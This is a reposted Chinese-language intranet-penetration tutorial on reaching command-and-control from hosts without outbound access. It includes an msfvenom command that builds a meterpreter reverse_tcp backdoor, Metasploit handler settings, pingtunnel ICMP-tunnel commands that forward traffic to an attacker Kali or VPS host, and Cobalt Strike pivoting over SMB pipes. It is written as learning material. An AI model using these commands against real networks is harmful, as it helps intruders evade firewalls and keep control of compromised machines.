内网渗透-不出网上线学习研究_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

内网渗透-不出网上线学习研究

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


内网渗透-不出网上线学习研究

原文链接: https://xz.aliyun.com/t/13918 引言 在网络安全领域,内网不出网是一个常见问题,它可能由于网络协议封杀或者内网完全无网络连接造成。本文将介绍隧道技术和代理技术,以及如何在不同情况下应用这些技术来解决问题。 在解决内网不出网的时候我们首先应该要了解隧道技术和代理技术 隧道技术 隧道技术是一种在网络中创建私密通道以在不安全或公共网络上安全传输数据的方法。它允许将一种网络协议的数据封装在另一种网络协议的数据包中传输。 代理技术 代理是一种在网络中充当中间人的服务器或服务。它接收来自客户端的请求,并代表客户端向其他服务器或资源发出请求。代理服务器接收到请求后,可以修改请求或者在返回给客户端之前对其进行处理。 代理技术和隧道技术的区别 代理和隧道技术都可以用于安全性和访问控制,但它们的主要区别在于其作用和实现方式。代理更多地用于代表客户端请求资源,而隧道技术用于在网络中创建安全通道传输数据。 所以我们在内网协议被封杀的时候使用隧道技术。网络通信不通的时候使用代理技术 案例分析: 1.协议被封杀 今天列举的是tcp协议被封杀导致无法出网 msf绕过 首先生成后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=444 -f exe > msf.exe 然后msf启动监听,监听333端口 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server windows开启隧道将本地444端口icmp协议数据转发到攻击机IP的333端口上 pingtunnel.exe -type client -l 127.0.0.1:444 -s 192.168.4.1(kali) -t 192.168.4.1:333 -tcp 1 -noprint 1 -nolog 1 CS绕过 然后使用icmp1生成后门程序 kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server windows开启隧道将本地5555端口icmp协议数据转发到攻击机IP的6666端口上 pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.4.1(kali) -t vps地址:6666 -tcp 1 -noprint 1 -nolog 1 2.完全没有网络 内网环境 CS上线 第一步;先获取到web主机的权限(就是常规的web渗透拿到主机权限,这里就不演示了) 第二步:vps主机无法直接跟用户主机进行通讯,所以我们在win7上生成一个本地后门,然后通过web服务器进行上线 将2222的监听器生成后门程序,上传至用户主机执行 然后进web服务器会话交换,连接用户主机的2222端口 主机成功上线 MSF上线 同样要先拿到web服务器的权限,然后添加路由 生成后门,后门的连接地址0.0.0.0或127.0.0.1都行 将后门上传到用户主机执行 kali开启监听 成功上线 三层内网也是一样的 先添加路由 然后开启代理转发 设置代理 主机不出网,并且还有防火墙限制的情况怎么上线 这就要先说下正向连接和反向连接了 正向连接 作用:正向连接是指从客户端到服务器或目标系统的连接。在网络安全中,正向连接是常见的、允许的连接方式,允许用户或系统通过网络与其他系统或服务进行通信和交互。 使用场景:正向连接是网络中常见的连接形式,例如,当用户通过浏览器连接到网站、设备连接到服务器或者两个设备之间建立直接通信时,都属于正向连接。 反向连接 作用:反向连接是指从服务器或目标系统到客户端或其他系统的连接。在网络安全中,反向连接可能是不寻常的,因为它可以表示潜在的安全风险,如恶意软件或攻击者通过网络建立的连接。 使用场景:反向连接可能由恶意软件、僵尸网络(botnets)或黑客攻击中的后门程序使用。这种连接方式允许攻击者在远程控制系统或服务器,进行未经授权的操作或数据传输,而不被目标系统的防御机制察觉。 代理上线 知道了正向和反向连接我们开始绕过防火墙上线 windows_server2008和win7的上线就按上面说的方法正常上线就行,接下来上线win10 因为正向连接受到防火墙的限制,我们尝试反向连接,但是win10目前只有win7可以通信,所以我们用win7来转发上线 随后就会生成一个反向连接的监听器,将监听器上传到win10执行 执行后门,成功上线 SMB管道 接下来windows_server2016上线 因为win10做了入站规则,所以反向连接给win10,win10就会拒绝 直接选择正向硬刚防火墙正向规则,因为正向规则只允许访问打印机,也就是smb服务,文件共享协议 我们建立一个smb管道来进行上线 新建一个smb管道 使用可通信主机进行端口扫描 找到扫描出来的主机 账号密码都是前期收集到的信息。注:==没有账号密码无法利用== 监听器选择刚生成的smb管道,会话选择win10(能通信的网段主机)的 成功上线 文章来源:亿人安全 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

内网渗透-不出网上线学习研究